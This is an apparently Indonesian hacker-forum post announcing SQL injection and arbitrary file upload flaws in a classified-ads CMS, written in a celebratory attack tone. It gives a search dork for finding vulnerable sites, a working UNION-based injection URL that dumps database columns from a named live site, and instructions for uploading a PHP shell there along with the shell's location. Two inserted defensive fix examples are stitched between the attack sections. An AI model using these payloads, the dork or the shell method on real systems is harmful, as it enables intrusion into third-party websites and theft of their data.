Assalamu’alaikum wr.wb..
Alhamdulillah, I can be active in the underground again hehehe..
This time kk minato wants to invite friends to party a little :v .. let's get straight to it..
##############SQL CMS IKLAN BARIS#####################
# Dork :: inurl:“kategori.php?premium=” or just develop it further.. ;)
Vulnerability found in kategori.php
$id = $_GET['id'];
$id_kategori = $_GET['kategori'];
$qryISI_kat = select_db("kategori_iklan","*","id_kategori = '$id_kategori'");
$recISI_kat = fetch_array($qryISI_kat);
$id_iklan_premium = $_GET['premium'];
$id_iklan_gratis = $_GET['gratis'];
$qryISI_premium = select_db("iklan_premium","*","id_iklan_premium = '$id_iklan_premium'");
$recISI_premium = fetch_array($qryISI_premium);
$qryISI_gratis = select_db("iklan_gratis","*","id_iklan_gratis = '$id_iklan_gratis'");
$recISI_gratis = fetch_array($qryISI_gratis);
As you can see, there is no filter there.. XD
Demo:
The vulnerable column is in the title,
http://iklanbitcoin.com/kategori.php?kategori=3'and 0 union select 1,2,concat(0x3c2f7469746c653e3c613e,(Select+export_set(5,@:=0,(select+count(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)))-- -
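The fix for the kategori.php queries shown above, as an added example (not code from the CMS or from this post): the request value is validated as an integer and bound as a parameter instead of being placed inside the quoted SQL string. The function `select_by_id()`, the `nama` column, the in-memory SQLite database and the assumption that the ids are integers (as in `kategori=3`) are hypothetical; the table and id column names are the ones in the code above.

```php
<?php
// Added example: hypothetical replacement for the select_db() calls above.
// SQLite is used only so the example runs offline; the sample row is constructed.

const ALLOWED = [   // identifiers cannot be bound as parameters, so allow-list them
    'kategori_iklan' => 'id_kategori',
    'iklan_premium'  => 'id_iklan_premium',
    'iklan_gratis'   => 'id_iklan_gratis',
];

function select_by_id(PDO $pdo, string $table, $rawId): ?array
{
    if (!array_key_exists($table, ALLOWED)) {
        throw new InvalidArgumentException("unknown table: $table");
    }
    // Anything that is not a plain positive integer is rejected before any SQL runs.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null;
    }
    $column = ALLOWED[$table];
    // The value travels as a bound parameter, never as part of the SQL text.
    $stmt = $pdo->prepare("SELECT * FROM $table WHERE $column = :id");
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed sample data.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE kategori_iklan (id_kategori INTEGER PRIMARY KEY, nama TEXT)');
$pdo->exec("INSERT INTO kategori_iklan VALUES (3, 'Properti')");

// Constructed inputs: a normal id, then a value with a quote and UNION in it.
var_dump(select_by_id($pdo, 'kategori_iklan', '3'));
var_dump(select_by_id($pdo, 'kategori_iklan', "3'and 0 union select 1,2,3-- -"));
```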
#########arbitrary file upload CMS IKLAN BARIS ###################
File //iklan_gratis.php
$img = $_FILES['gambar']['type'];
$imgtype = strtolower($img);
/* if (($imgtype != "image/jpeg")&&($imgtype != "image/bmp")&&($imgtype != "image/gif")&&($imgtype != "image/x-png")){
alert('File gambar tidak dikenali!!!');
} */
NB:: The filter was commented out by the programmer XD
Demo::
Post a free ad.. fill in the boxes with anything..
Then upload a file with the extension,… shell.php.xxxjpg
The shell is located at http://iklanbitcoin.com/images/iklan_baris/shell.php.xxxjpg
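A hardened upload check for iklan_gratis.php, as an added example (not code from the CMS or from this post). Restoring the commented-out filter would not be enough, because `$_FILES['gambar']['type']` is supplied by the client; this version inspects the file content and assigns its own file name and extension. The function `safe_image_name()`, the size limit and the sample files are hypothetical.

```php
<?php
// Added example: hypothetical content check and naming for uploaded ad images.

const IMAGE_TYPES = [   // content-sniffed MIME type => extension the server assigns
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

// Returns the server-chosen file name to store under, or null to reject the upload.
function safe_image_name(string $tmpPath, int $size, int $maxBytes = 2097152): ?string
{
    if ($size <= 0 || $size > $maxBytes || !is_file($tmpPath)) {
        return null;
    }
    // Sniff the bytes on disk; the client-sent type and name are not trusted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!is_string($mime) || !array_key_exists($mime, IMAGE_TYPES)) {
        return null;
    }
    // Never reuse the client's name: "shell.php.xxxjpg" still contains ".php".
    return bin2hex(random_bytes(16)) . '.' . IMAGE_TYPES[$mime];
}

// In the real handler: pass $_FILES['gambar']['tmp_name'] and ['size'], confirm
// is_uploaded_file(), then move_uploaded_file() to the returned name.

// Constructed samples: a PHP script, and a minimal GIF header.
$php = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($php, "<?php echo 'constructed sample'; ?>");
$gif = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($gif, "GIF89a\x01\x00\x01\x00\x00\x00\x00;");

var_dump(safe_image_name($php, filesize($php)));   // rejected upload
var_dump(safe_image_name($gif, filesize($gif)));   // accepted, renamed by the server

unlink($php);
unlink($gif);
```

A content check alone does not stop a file that is both a valid image and contains script text, so the image directory should also be configured so the web server never executes anything stored in it.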
Below are the targets I got from my auto scanner.. enjoy.. let's rock Indonesian CMS XD
Stay tuned for the next update... there are many secrets we will study ^_^
Greetings from the Sec7or family